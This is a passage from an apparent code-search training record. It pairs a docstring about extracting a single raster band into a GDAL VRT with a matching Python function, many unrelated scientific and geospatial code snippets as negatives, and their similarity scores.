filename\n abr_control.utils.os_utils.makedirs(folder)\n\n if self.use_cython is True:\n # binaries saved by specifying tempdir parameter\n function = autowrap(expression, backend=\"cython\",\n args=parameters, tempdir=folder)\n function = sp.lambdify(parameters, expression, \"numpy\")\n\n return function", "def _add_function(self, alias, func):\n # Construct a function that will call the user supplied function with\n # the proper arguments. 
We prepend 'self' so the user supplied function\n # has easy access to all the filepaths.\n def fname(**kwargs):\n return func(self, **kwargs)\n\n # Bind the fname function to this instance of FileNames\n self.__dict__[alias] = fname", "def get_verts(ulist, vlist, func):\n verts = []\n for u in ulist:\n for v in vlist:\n verts.append(func(u, v))\n return verts", "def ramlwrap(file_path, function_map):\n\n try:\n # Check if file is RAML (.raml)\n if file_path.endswith(\".raml\"):\n patterns = raml_url_patterns(file_path, function_map)\n else:\n error_msg = \"The file: '{}' does not have a .raml extension!\".format(file_path)\n logger.error(error_msg)\n raise FatalException(error_msg)\n\n except AttributeError as error:\n error_msg = \"An error occurred reading '{}': {}\".format(file_path, error)\n logger.error(error_msg)\n raise FatalException(error_msg)\n\n return patterns", "def file_converter(self, **kwds):\n if (self.reformat == 'zarr'):\n # output zarr file\n self.HDF5_to_zarr(**kwds)\n elif (self.reformat == 'HDF5'):\n # output rechunked HDF5 file\n self.HDF5_to_HDF5(**kwds)\n # elif (reformat == 'JPL'):\n # # output JPL captoolkit formatted HDF5 files\n # self.HDF5_to_JPL_HDF5(**kwds)\n elif self.reformat in ('csv','txt'):\n # output reduced files to ascii formats\n self.HDF5_to_ascii(**kwds)\n elif self.reformat in ('dataframe',):\n # output reduced files to pandas dataframe\n return self.HDF5_to_dataframe(**kwds)\n else:\n raise ValueError(f'Unknown format {self.reformat}')", "def process_data(cur, conn, filepath, func):\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root,'*.json'))\n for f in files :\n all_files.append(os.path.abspath(f))\n\n num_files = len(all_files)\n print('{} files found in {}'.format(num_files, filepath))\n\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print('{}/{} files processed.'.format(i, num_files))", "def get_vit_fn(model, num_classes, spatial_res):\n model = model.lower()\n assert model in VIT_FNS\n vit_fn = VIT_FNS[model]\n\n def wrapped_vit_model_fn(*args, **kwargs):\n return vit_fn(*args, num_classes=num_classes,\n image_size=spatial_res, **kwargs)\n return wrapped_vit_model_fn", "def _rasterize_vector_onto_base(\n base_raster_path, base_vector_path, attribute_id,\n target_raster_path, filter_string=None):\n base_raster = gdal.OpenEx(base_raster_path, gdal.OF_RASTER)\n raster_driver = gdal.GetDriverByName('GTiff')\n target_raster = raster_driver.CreateCopy(target_raster_path, base_raster)\n base_raster = None\n\n vector = gdal.OpenEx(base_vector_path)\n layer = vector.GetLayer()\n\n if filter_string is not None:\n layer.SetAttributeFilter(str(filter_string))\n gdal.RasterizeLayer(\n target_raster, [1], layer,\n options=['ATTRIBUTE=%s' % attribute_id])\n target_raster.FlushCache()\n target_raster = None\n layer = None\n vector = None", "def get_transfer_functioin(self, color_file=None, volume_opacity=0.25):\n if color_file: # Color file is given\n\n import csv\n fid = open(color_file, \"r\")\n reader_color = csv.reader(fid)\n\n dict_RGB = {}\n for line in reader_color:\n dict_RGB[int(line[0])] = [float(line[2]) / 255.0,\n float(line[3]) / 255.0,\n float(line[4]) / 255.0]\n fid.close()\n\n # Define colour transfer function\n color_transfor = vtk.vtkColorTransferFunction()\n\n for idx in dict_RGB.keys():\n color_transfor.AddRGBPoint(idx,\n dict_RGB[idx][0],\n dict_RGB[idx][1],\n dict_RGB[idx][2])\n\n # Opacity 
transfer function\n opacity_scalar = vtk.vtkPiecewiseFunction()\n\n for idx in dict_RGB.keys():\n opacity_scalar.AddPoint(\n idx, volume_opacity if idx != 0 else 0.0)\n\n # Opacity Gradient Transfer function\n opacity_gradient = vtk.vtkPiecewiseFunction()\n opacity_gradient.AddPoint(1, 0.0)\n opacity_gradient.AddPoint(5, 0.1)\n opacity_gradient.AddPoint(100, 1.0)\n\n return color_transfor, opacity_scalar, opacity_gradient\n\n else: # Default color transfer functions\n\n # min, max = self.get_value_range()\n color_transfor = vtk.vtkColorTransferFunction()\n color_transfor.AddRGBPoint(0, 0.0, 0.0, 0.0)\n color_transfor.AddRGBPoint(500, 1.0, 0.5, 0.3)\n color_transfor.AddRGBPoint(1000, 1.0, 0.5, 0.3)\n color_transfor.AddRGBPoint(1150, 1.0, 1.0, 0.9)\n\n # The opacity transfer function is used to control the opacity\n # of different tissue types.\n opacity_scalar = vtk.vtkPiecewiseFunction()\n opacity_scalar.AddPoint(0, 0.00)\n opacity_scalar.AddPoint(500, 0.15)\n opacity_scalar.AddPoint(1000, 0.15)\n opacity_scalar.AddPoint(1150, 0.85)\n\n # The gradient opacity function is used to decrease the opacity\n # in the \"flat\" regions of the volume while maintaining the opacity\n # at the boundaries between tissue types. The gradient is measured\n # as the amount by which the intensity changes over unit distance.\n # For most medical data, the unit distance is 1mm.\n opacity_gradient = vtk.vtkPiecewiseFunction()\n opacity_gradient.AddPoint(0, 0.0)\n opacity_gradient.AddPoint(90, 0.5)\n opacity_gradient.AddPoint(100, 1.0)\n\n return color_transfor, opacity_scalar, opacity_gradient", "def input_fn():\n files = tf.data.Dataset.list_files(os.path.join(\n tft_working_dir, filebase + '*'))\n dataset = files.interleave(\n tf.data.TFRecordDataset, cycle_length=4, block_length=16)\n dataset = dataset.map(parser)\n\n if shuffle:\n dataset = dataset.shuffle(buffer_size)\n\n dataset = dataset.repeat(num_epochs)\n dataset = dataset.batch(batch_size)\n\n dataset = dataset.prefetch(prefetch_buffer_size)\n iterator = dataset.make_one_shot_iterator()\n transformed_features, transformed_labels = iterator.get_next()\n\n return transformed_features, transformed_labels", "def process_data(cur, conn, filepath: str, func: Callable) -> None:\n # get all files matching extension from directory\n all_files = []\n for root, dirs, files in os.walk(filepath):\n files = glob.glob(os.path.join(root, \"*.json\"))\n for f in files:\n all_files.append(os.path.abspath(f))\n\n # get total number of files found\n num_files = len(all_files)\n print(\"{} files found in {}\".format(num_files, filepath))\n\n # iterate over files and process\n for i, datafile in enumerate(all_files, 1):\n func(cur, datafile)\n conn.commit()\n print(\"{}/{} files processed.\".format(i, num_files))", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def main(input_filepath, output_filepath):\n logger = logging.getLogger(__name__)\n logger.info('making final data set from raw data')", "def list_functions(filename, output_file):\n file_pointer = open(filename)\n file_split = filename.replace(\"/\",\".\")\n file_split = file_split.split(\".\")\n\n file_text = file_pointer.read()\n my_re = re.compile(\"\\ndef ([a-z][^\\(]*)\")\n functions = my_re.findall(file_text)\n functions.sort()\n first = True\n\n cr_re = re.compile(r\"\\n *\")\n for function in functions:\n function = cr_re.sub(\" \", function)\n if first:\n first = False\n output_file.write(\"Functions\\n\")\n 
output_file.write(\"^^^^^^^^^\\n\")\n output_file.write(\"- \")\n module = file_split[4]\n output_file.write(f\":func:`~arcade.{module}.{function}`\")\n output_file.write(\"\\n\")\n if not first:\n output_file.write(\"\\n\")", "def rasterize(\n ctx,\n files,\n output,\n driver,\n like,\n bounds,\n dimensions,\n res,\n src_crs,\n all_touched,\n default_value,\n fill,\n prop,\n force_overwrite,\n creation_options):\n from rasterio.crs import CRS\n from rasterio.features import rasterize\n from rasterio.features import bounds as calculate_bounds\n\n verbosity = (ctx.obj and ctx.obj.get('verbosity')) or 1\n\n output, files = resolve_inout(\n files=files, output=output, force_overwrite=force_overwrite)\n\n bad_param = click.BadParameter('invalid CRS. Must be an EPSG code.',\n ctx, param=src_crs, param_hint='--src_crs')\n has_src_crs = src_crs is not None\n try:\n src_crs = CRS.from_string(src_crs) if has_src_crs else CRS.from_string('EPSG:4326')\n except CRSError:\n raise bad_param\n\n # If values are actually meant to be integers, we need to cast them\n # as such or rasterize creates floating point outputs\n if default_value == int(default_value):\n default_value = int(default_value)\n if fill == int(fill):\n fill = int(fill)\n\n with rasterio.Env(CPL_DEBUG=verbosity > 2):\n\n def feature_value(feature):\n if prop and 'properties' in feature:\n return feature['properties'].get(prop, default_value)\n return default_value\n\n with click.open_file(files.pop(0) if files else '-') as gj_f:\n geojson = json.loads(gj_f.read())\n if 'features' in geojson:\n geometries = []\n for f in geojson['features']:\n geometries.append((f['geometry'], feature_value(f)))\n elif 'geometry' in geojson:\n geometries = ((geojson['geometry'], feature_value(geojson)), )\n else:\n raise click.BadParameter('Invalid GeoJSON', param=input,\n param_hint='input')\n\n geojson_bounds = geojson.get('bbox', calculate_bounds(geojson))\n\n if os.path.exists(output):\n with rasterio.open(output, 'r+') as out:\n if has_src_crs and src_crs != out.crs:\n raise click.BadParameter('GeoJSON does not match crs of '\n 'existing output raster',\n param='input', param_hint='input')\n\n if disjoint_bounds(geojson_bounds, out.bounds):\n click.echo(\"GeoJSON outside bounds of existing output \"\n \"raster. Are they in different coordinate \"\n \"reference systems?\",\n err=True)\n\n meta = out.meta.copy()\n\n result = rasterize(\n geometries,\n out_shape=(meta['height'], meta['width']),\n transform=meta.get('affine', meta['transform']),\n all_touched=all_touched,\n dtype=meta.get('dtype', None),\n default_value=default_value,\n fill=fill)\n\n for bidx in range(1, meta['count'] + 1):\n data = out.read(bidx, masked=True)\n # Burn in any non-fill pixels, and update mask accordingly\n ne = result != fill\n data[ne] = result[ne]\n data.mask[ne] = False\n out.write(data, indexes=bidx)\n\n else:\n if like is not None:\n template_ds = rasterio.open(like)\n\n if has_src_crs and src_crs != template_ds.crs:\n raise click.BadParameter('GeoJSON does not match crs of '\n '--like raster',\n param='input', param_hint='input')\n\n if disjoint_bounds(geojson_bounds, template_ds.bounds):\n click.echo(\"GeoJSON outside bounds of --like raster. 
\"\n \"Are they in different coordinate reference \"\n \"systems?\",\n err=True)\n\n kwargs = template_ds.meta.copy()\n kwargs['count'] = 1\n\n # DEPRECATED\n # upgrade transform to affine object or we may get an invalid\n # transform set on output\n kwargs['transform'] = template_ds.affine\n\n template_ds.close()\n\n else:\n bounds = bounds or geojson_bounds\n\n if src_crs.is_geographic:\n if (bounds[0] < -180 or bounds[2] > 180 or\n bounds[1] < -80 or bounds[3] > 80):\n raise click.BadParameter(\n \"Bounds are beyond the valid extent for \"\n \"EPSG:4326.\",\n ctx, param=bounds, param_hint='--bounds')\n\n if dimensions:\n width, height = dimensions\n res = (\n (bounds[2] - bounds[0]) / float(width),\n (bounds[3] - bounds[1]) / float(height)\n )\n\n else:\n if not res:\n raise click.BadParameter(\n 'pixel dimensions are required',\n ctx, param=res, param_hint='--res')\n\n elif len(res) == 1:\n res = (res[0], res[0])\n\n width = max(int(ceil((bounds[2] - bounds[0]) /\n float(res[0]))), 1)\n height = max(int(ceil((bounds[3] - bounds[1]) /\n float(res[1]))), 1)\n\n kwargs = {\n 'count': 1,\n 'crs': src_crs,\n 'width': width,\n 'height': height,\n 'transform': Affine(res[0], 0, bounds[0], 0, -res[1],\n bounds[3]),\n 'driver': driver\n }\n kwargs.update(**creation_options)\n\n result = rasterize(\n geometries,\n out_shape=(kwargs['height'], kwargs['width']),\n transform=kwargs.get('affine', kwargs['transform']),\n all_touched=all_touched,\n dtype=kwargs.get('dtype', None),\n default_value=default_value,\n fill=fill)\n\n if 'dtype' not in kwargs:\n kwargs['dtype'] = result.dtype\n\n kwargs['nodata'] = fill\n\n with rasterio.open(output, 'w', **kwargs) as out:\n out.write(result, indexes=1)", "def vtp(self, f_vtu, f_vtp):\r\n reader = vtk.vtkXMLUnstructuredGridReader()\r\n reader.SetFileName(f_vtu)\r\n reader.Update()\r\n ugrid = reader.GetOutput()\r\n geometryFilter = vtk.vtkGeometryFilter()\r\n geometryFilter.SetInputData(ugrid)\r\n geometryFilter.Update()\r\n polydata = geometryFilter.GetOutput()\r\n writer =vtk.vtkXMLPolyDataWriter()\r\n writer.SetFileName(f_vtp)\r\n writer.SetInputData(polydata)\r\n writer.Write()\r\n print(\"vtp file created.\")", "def func(self, name, vecs):\n arity = len(vecs)\n funcobj = self.get_ground_vector('!Func:{}:{}'.format(arity, name))\n\n argobjs = [\n associate_comp(\n self.get_ground_vector('!Arg:{}:{}:{}'.format(arity, name, i)),\n vec)\n for i, vec in enumerate(vecs) ]\n\n result = normalize_comp(\n self.func_weights @\n torch.cat([\n funcobj,\n merge(argobjs),\n merge(vecs),\n ]).reshape(-1, 2 * self.hrr_size)).reshape(2, self.hrr_size)\n\n return result", "def func(self, name, vecs):\n arity = len(vecs)\n funcobj = self.get_ground_vector('!Func:{}:{}'.format(arity, name))\n\n argobjs = [\n associate_comp(\n self.get_ground_vector('!Arg:{}:{}:{}'.format(arity, name, i)),\n vec)\n for i, vec in enumerate(vecs) ]\n\n result = normalize_comp(\n self.func_weights @\n torch.cat([\n funcobj,\n merge(argobjs),\n merge(vecs),\n ]).reshape(-1, 2 * self.hrr_size)).reshape(2, self.hrr_size)\n\n return result", "def map(self, function):\n pass" ]
[ "0.5867644", "0.5854852", "0.55360836", "0.52705306", "0.52492493", "0.52203393", "0.50498486", "0.50492585", "0.49810517", "0.49677193", "0.4958387", "0.49372962", "0.4903304", "0.4866099", "0.4855312", "0.4854982", "0.4847482", "0.48274714", "0.48194093", "0.48180053", "0.48166987", "0.48053375", "0.47922784", "0.47851402", "0.47790444", "0.4766691", "0.47532347", "0.47505015", "0.47469786", "0.4730921", "0.47222206", "0.47211903", "0.47167945", "0.47099823", "0.47059247", "0.47042257", "0.46952733", "0.46944457", "0.46904847", "0.46774563", "0.46732005", "0.46714556", "0.46680468", "0.46638173", "0.46617842", "0.46470067", "0.46463394", "0.46454737", "0.4642319", "0.46407366", "0.46318436", "0.46218064", "0.46205938", "0.4619611", "0.46186405", "0.4612022", "0.4607727", "0.45800278", "0.45761594", "0.457386", "0.45732576", "0.4561411", "0.45595834", "0.45570475", "0.45559648", "0.4553753", "0.45448166", "0.45423642", "0.45397243", "0.4535832", "0.45291469", "0.4528213", "0.45054793", "0.44969362", "0.44949448", "0.44895923", "0.44854906", "0.44788384", "0.44703394", "0.4469909", "0.44595578", "0.44576818", "0.44538018", "0.4452553", "0.4450711", "0.4447997", "0.4446187", "0.4445656", "0.44442564", "0.44420236", "0.44394374", "0.44335666", "0.4427762", "0.4427762", "0.44242752", "0.44210765", "0.44186485", "0.4418442", "0.4418442", "0.44167835" ]
0.7520964
0
Takes an inputfile (probably a VRT) and generates a singleband VRT.
def extract_color_band(inputfile, band): dataset = Dataset(inputfile) if not 1 <= band <= dataset.RasterCount: raise ValueError( "band must be between 1 and {0}".format(dataset.RasterCount) ) command = [ GDALTRANSLATE, '-q', # Quiet '-of', 'VRT', # Output to VRT '-b', band, # Single band inputfile, '/vsistdout' ] try: return VRT(check_output_gdal([str(e) for e in command])) except CalledGdalError as e: if e.error == ("ERROR 6: Read or update mode not supported on /vsistdout"): # HACK: WTF?!? return VRT(e.output) raise
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def build_vrt(vrt: str, files: List[str], resample_name: str) -> None:\n\n options = gdal.BuildVRTOptions(srcNodata=0)\n gdal.BuildVRT(destName=vrt, srcDSOrSrcDSTab=files, options=options)\n add_pixel_fn(vrt, resample_name)", "def run_vorpaline(self, input_file, *options):\n\n self._input_file = input_file\n args = list(options) + [self._input_file, 'out.meshb']\n self._run_command(\"vorpalite\", args)", "def convert_vrt(fname, out_fname, dataset_name='dataset',\n compression=H5CompressionFilter.LZF, filter_opts=None,\n attrs=None):\n with h5py.File(out_fname) as fid:\n with rasterio.open(fname) as rds:\n # set default chunks and set dimensions\n if rds.count == 3:\n chunks = (3, 256, 256)\n dims = (3, rds.height, rds.width)\n else:\n chunks = (256, 256)\n dims = (rds.height, rds.width)\n\n # create empty or copy the user supplied filter options\n if not filter_opts:\n filter_opts = dict()\n filter_opts['chunks'] = chunks\n else:\n filter_opts = filter_opts.copy()\n\n\n if 'chunks' not in filter_opts:\n filter_opts['chunks'] = chunks\n\n # modify to have 3D chunks if we have a multiband vrt\n if rds.count == 3 and len(filter_opts['chunks']) != 3:\n # copy the users original 2D chunk and insert the third\n chunks = list(filter_opts['chunks'])\n chunks.insert(0, 3)\n filter_opts['chunks'] = chunks\n\n # dataset attributes\n if attrs:\n attrs = attrs.copy()\n else:\n attrs = {}\n\n attrs['geotransform'] = rds.transform.to_gdal()\n attrs['crs_wkt'] = rds.crs.wkt\n\n # dataset creation options\n kwargs = compression.config(**filter_opts).dataset_compression_kwargs()\n kwargs['shape'] = dims\n kwargs['dtype'] = rds.dtypes[0]\n\n dataset = fid.create_dataset(dataset_name, **kwargs)\n attach_image_attributes(dataset, attrs)\n\n # tiled processing (all cols by chunked rows)\n ytile = filter_opts['chunks'][1] if rds.count == 3 else filter_opts['chunks'][0]\n tiles = generate_tiles(rds.width, rds.height, rds.width, ytile)\n\n for tile in tiles:\n # numpy index\n if rds.count == 3:\n idx = (\n slice(None),\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n else:\n idx = (\n slice(tile[0][0], tile[0][1]),\n slice(tile[1][0], tile[1][1])\n )\n\n # ensure single band rds is read as 2D not 3D\n data = rds.read(window=tile) if rds.count == 3 else rds.read(1, window=tile)\n\n # write\n dataset[idx] = data", "def create_video(input_file, output_file):\n input_video = VideoFileClip(input_file)\n output_video = input_video.fl_image(detect_lane.fit_and_plot)\n output_video.write_videofile(output_file, audio=False)", "def readFT(self,file=\"out__1.ft\"):", "def _write_raw_brainvision(raw, bids_fname, events, overwrite):\n if not check_version(\"pybv\", PYBV_VERSION): # pragma: no cover\n raise ImportError(\n f\"pybv >= {PYBV_VERSION} is required for converting\"\n \" file to BrainVision format\"\n )\n from pybv import write_brainvision\n\n # Subtract raw.first_samp because brainvision marks events starting from\n # the first available data point and ignores the raw.first_samp\n if events is not None:\n events[:, 0] -= raw.first_samp\n events = events[:, [0, 2]] # reorder for pybv required order\n meas_date = raw.info[\"meas_date\"]\n if meas_date is not None:\n meas_date = _stamp_to_dt(meas_date)\n\n # pybv needs to know the units of the data for appropriate scaling\n # get voltage units as micro-volts and all other units \"as is\"\n unit = []\n for chs in raw.info[\"chs\"]:\n if chs[\"unit\"] == FIFF.FIFF_UNIT_V:\n unit.append(\"µV\")\n else:\n unit.append(_unit2human.get(chs[\"unit\"], 
\"n/a\"))\n unit = [u if u not in [\"NA\"] else \"n/a\" for u in unit]\n\n # We enforce conversion to float32 format\n # XXX: pybv can also write to int16, to do that, we need to get\n # original units of data prior to conversion, and add an optimization\n # function to pybv that maximizes the resolution parameter while\n # ensuring that int16 can represent the data in original units.\n if raw.orig_format != \"single\":\n warn(\n f'Encountered data in \"{raw.orig_format}\" format. '\n \"Converting to float32.\",\n RuntimeWarning,\n )\n\n # Writing to float32 µV with 0.1 resolution are the pybv defaults,\n # which guarantees accurate roundtrip for values >= 1e-7 µV\n fmt = \"binary_float32\"\n resolution = 1e-1\n write_brainvision(\n data=raw.get_data(),\n sfreq=raw.info[\"sfreq\"],\n ch_names=raw.ch_names,\n ref_ch_names=None,\n fname_base=op.splitext(op.basename(bids_fname))[0],\n folder_out=op.dirname(bids_fname),\n overwrite=overwrite,\n events=events,\n resolution=resolution,\n unit=unit,\n fmt=fmt,\n meas_date=None,\n )", "def simulate_UVSPEC(file, config):\n\n wavelength = config['wavelength']\n\n # Coordenates from position of the station Hannover\n latitude = 52.39 # positive in the northern hemisphere\n longitud = 9.7 # negative reckoning west from prime meridian in Greenwich,\n\n # Read name of the file (correct time)\n name = os.path.split(file)\n time_n = name[1][0:15]\n print(\"Time name\", time_n)\n # convert time to datetime format\n time = datetime.datetime.strptime(time_n,\n '%Y%m%d_%H%M%S')\n # Calculate the azimuth and zenith angles in function of the date\n elev = ps.GetAltitude(latitude, longitud, time)\n azi = ps.GetAzimuth(latitude, longitud, time)\n zenith = 90 - elev\n\n # Correction between the sign and real azimuth for plot of radiance\n if -180 <= azi < 0:\n azi = 180 - azi\n elif -360 <= azi < -180:\n azi = -azi - 180\n else:\n pass\n\n print(\"Azimuth: {:5.1f}\".format(azi),\n \"\\nZenith: {:5.1f}\".format(zenith))\n\n # Change the value of zenith and azimuth angles in function of the time and\n # position in the UVSPEC file\n\n with open(config['personal_libraries'] + 'MUDIS_HDF5/MUDIS_radiance_Input.txt', 'r') as file:\n data = file.readlines()\n\n data[14] = \"day_of_year \" + str(time.timetuple().tm_yday) + \" \" + \"\\n\"\n data[15] = \"wavelength \" + str(\"{}\".format(wavelength)) + \" \" + \\\n str(\"{}\".format(wavelength)) + \\\n \" # wavelength to calcule [nm] \\n\"\n data[17] = \"sza \" + str(\"{:2.3f}\".format(zenith)) + \\\n \" # Solar zenith angle \\n\"\n data[18] = \"phi0 \" + str(\"{:2.3f}\".format(azi)) + \\\n \" #Azimuth angle with zenith position \\n\"\n\n with open(config['personal_libraries'] + 'MUDIS_HDF5/MUDIS_radiance_Input.txt', 'w') as file:\n file.writelines(data)\n\n # Create the directory to save the results\n os.makedirs(os.path.dirname(config['str_dir'] + '/simulation/' + '{}/{}nm/txt_files/'.format(time_n[0:8],\n wavelength)),\n exist_ok=True)\n\n # Run the program UVSPEC in the terminal\n os.system(config['UVSPEC_path'] + 'uvspec < ' + config['personal_libraries'] +\n 'MUDIS_HDF5/MUDIS_radiance_Input.txt> ' + config['str_dir'] + '/simulation/' +\n '{}/{}nm/txt_files/'.format(time_n[0:8], wavelength) + time_n +\n '.txt')", "def make_big_vdwradii( targetpath ):\n\n file = open( os.path.join( targetpath, 'vdwradii.dat'), 'w')\n text=\"\"\"; Very approximate VanderWaals radii\n; only used for drawing atoms as balls or for calculating atomic overlap.\n; longest matches are used\n; '???' 
or '*' matches any residue name\n; 'AAA' matches any protein residue name\n; MODIFIED TO USE BIG VDW RADII TO PREVENT WATERS BEING PUT IN THE PROTEIN WHERE WE DON'T WANT THEM. DLM\n??? C 0.3\n??? F 0.3\n??? H 0.3\n??? N 0.3\n??? O 0.3\n??? P 0.3\n??? S 0.3\n??? LP1 0\n??? LP2 0\nSOL H 0.04\nSOL O 0.105\nWAT H 0.04\nWAT O 0.105\nGLY MN1 0\nGLY MN2 0\nALA MCB1 0\nALA MCB2 0 \nVAL MCG1 0 \nVAL MCG2 0 \nILE MCG1 0 \nILE MCG2 0 \nILE MCD1 0 \nILE MCD2 0 \nLEU MCD1 0 \nLEU MCD2 0 \nMET MCE1 0 \nMET MCE2 0 \nTRP MTRP1 0 \nTRP MTRP2 0\nTHR MCG1 0\nTHR MCG2 0\nLYSH MNZ1 0 \nLYSH MNZ2 0 \n\"\"\" \n file.writelines(text)\n file.close()", "def make_vrt(self):\n for index, i in enumerate(self.months):\n month = str(index + 1)\n if len(month) < 2:\n month = '0' + month\n txt_file = i.joinpath('subnational/tiffs.txt')\n outfile = i.joinpath(f'{self.country}_{month}_normalised.vrt')\n if not outfile.exists():\n gdal_cmd = f'gdalbuildvrt -input_file_list {str(txt_file)} {str(outfile)}'\n subprocess.call(gdal_cmd, shell=True)", "def copy_vrt(in_fname, out_fname=None, bbox=None, verbose=True):\n from gdal import Translate\n\n if out_fname is None:\n out_fname = in_fname + \".vrt\"\n\n # Using Translate... but would use Warp if every reprojecting\n if bbox:\n left, bottom, right, top = bbox\n projwin = (left, top, right, bottom) # unclear why Translate does UL LR\n else:\n projwin = None\n if verbose:\n logger.info(f\"Creating {out_fname}, subset bbox: {bbox}\")\n Translate(out_fname, in_fname, projWin=projwin)", "def genChirpVC(Vclamp=-70,Rm=100,amp=10,graphToo=False):\n xs,ys,zi=genSine()\n ys=ys*amp+Vclamp\n genATF(xs,ys,'stimulus-VC.atf')\n graphData(xs,ys,zi,\"Voltage Clamp Stimulus\",'stimulus-VC.png')", "def subset_multiband_vrt(src: Union[str, Path], band_request: Sequence = []):\n if not isinstance(src, (str, Path)) and not Path(src).is_file():\n raise ValueError(f\"Invalid source multiband raster.\\n\"\n f\"Got {src}\")\n with rasterio.open(src) as ras, MemoryFile() as mem:\n riocopy(ras, mem.name, driver='VRT')\n vrt_xml = mem.read().decode('utf-8')\n vrt_dataset = ET.fromstring(vrt_xml)\n vrt_dataset_dict = {int(band.get('band')): band for band in vrt_dataset.iter(\"VRTRasterBand\")}\n for band in vrt_dataset_dict.values():\n vrt_dataset.remove(band)\n\n for dest_band_idx, src_band_idx in enumerate(band_request, start=1):\n vrt_band = vrt_dataset_dict[src_band_idx]\n vrt_band.set('band', str(dest_band_idx))\n vrt_dataset.append(vrt_band)\n\n return ET.tostring(vrt_dataset).decode('UTF-8')", "def stack_singlebands_vrt(srcs: List, band: int = 1):\n vrt_bands = []\n for srcnum, src in enumerate(srcs, start=1):\n with check_rasterio_im_load(src) as ras, MemoryFile() as mem:\n riocopy(ras, mem.name, driver='VRT')\n vrt_xml = mem.read().decode('utf-8')\n vrt_dataset = ET.fromstring(vrt_xml)\n for bandnum, vrt_band in enumerate(vrt_dataset.iter('VRTRasterBand'), start=1):\n if bandnum == band:\n vrt_band.set('band', str(srcnum))\n vrt_bands.append(vrt_band)\n vrt_dataset.remove(vrt_band)\n for vrt_band in vrt_bands:\n vrt_dataset.append(vrt_band)\n\n return ET.tostring(vrt_dataset).decode('UTF-8')", "def vtt_to_srt(str_name_file: str):\n file_contents: str = read_text_file(str_name_file)\n str_data: str = \"\"\n str_data = str_data + convert_content(file_contents)\n str_name_file: str = str_name_file.replace(\".vtt\", \".srt\")\n print(str_name_file)\n file_create(str_name_file, str_data)", "def change_input(filename, frac_l=0.019994, force=25.0, time=200_000, seed=None):\r\n\r\n frac_sl = round(1.5 
/(32**3 *3), 6)\r\n frac_l = round(frac_l -frac_sl, 6)\r\n frac_w = round(1 -frac_l -frac_sl, 6)\r\n \r\n params = {'Box': \"32 32 32\\t1 1 1\", 'RNGSeed': seed if seed is not None else -4073, 'Step': 0.02, 'Time': time, \r\n 'SamplePeriod': 100, 'AnalysisPeriod': 1000, 'DensityPeriod': time, 'DisplayPeriod': time //10, 'RestartPeriod': time,\r\n }\r\n\r\n with open(filename, 'rt') as rf:\r\n with open(filename+'_sim', 'wt') as wf:\r\n\r\n for line in rf:\r\n \r\n if line.startswith('Polymer\\tWater') or line.startswith('Polymer Water'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_w:.6f}\"\r\n \r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n\r\n elif line.startswith('Polymer\\tLipid') or line.startswith('Polymer Lipid'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_l:.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n \r\n elif line.startswith('Polymer\\tSingleLipid') or line.startswith('Polymer SingleLipid'):\r\n line = line.strip().split()\r\n line[2] = f\"{frac_sl:.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n\r\n elif line.startswith('Command\\tConstantForceOnTarget') or line.startswith('Command ConstantForceOnTarget'):\r\n line = line.strip().split()\r\n\r\n if line[3] == \"singleLipidHead\":\r\n line[-1] = f\"{force /3:.6f}\" \r\n\r\n elif line[3] == \"lowerHeads\":\r\n line[-1] = f\"{force /3 /(1636):.6f}\"\r\n\r\n # Converts list to list[str]\r\n line = list(map(str, line))\r\n wf.write('\\t'.join(line) + '\\n')\r\n \r\n # if line.startswith('\tTimes\t0 1000'):\r\n # line = line.strip().split()\r\n # line[2] = f\"{time}\"\r\n \r\n # # Converts list to list[str]\r\n # line = list(map(str, line))\r\n # wf.write('\\t'.join(line) + '\\n') \r\n # line = next(rf) \r\n \r\n # if line.strip().split() and line.strip().split()[0] in params.keys():\r\n # key = line.strip().split()[0]\r\n # wf.write(f\"{key:<12}\\t{str(params[key])}\\n\")\r\n\r\n else:\r\n wf.write(line)", "def __init__(self, filename):\r\n self.__output__ = open(format(filename, '08X') + '.gen', 'wb')", "def write_input_file(y,z,fname):\n file = open('c:/4nec2/out/' + fname + '.nec', 'w')\n file.write('CM Seeddesign \\n')\n file.write('CM Zigzag Antenna \\n')\n file.write('CE File generated by python \\n')\n seg = 1\n\n #write the antenna\n for i in range(0,len(y)-1):\n file.write('GW %3i %3i %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f %8.4f\\n' % (1,seg,0,y[i],z[i],0,y[i+1],z[i+1],1))\n\n file.write('GE 0 \\n')\n file.write('EK \\n')\n file.write('EX %3i %3i %3i %3i %3i %3i %3i\\n' % (0,1,1,1,1,0,0))\n file.write('GN -1 \\n')\n \n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,1,0,0,900,0))\n file.write('FR %3i %3i %3i %3i %8.4f %8.4f\\n' % (0,11,0,0,850,10))\n\n file.write('LD %3i %3i %3i %3i %8.4f %8.4f\\n' % (5,1,0,0,58000000,2))\n file.write('RP %3i %3i %3i %3i %8.4f %8.4f %8.4f %8.4f\\n' % (0,1,1,1000,90,0,0,0))\n\n file.write('EN \\n')\n file.close()", "def get_rad_file(self, input_file, out_dir, overwrite_rad):\n # name of the rad file - replace psv with rad (or PSV with RAD)\n self.rad_file = self.get_rad_filename(input_file)\n\n if \"rad\" in self.rad_file.lower() and self.rad_file.lower().endswith(\".tab\"):\n if self.rad_file == input_file:\n return True\n if os.path.isfile(self.rad_file) and not overwrite_rad:\n # valid rad file already exists, just return\n return True\n\n # input is psv and rad 
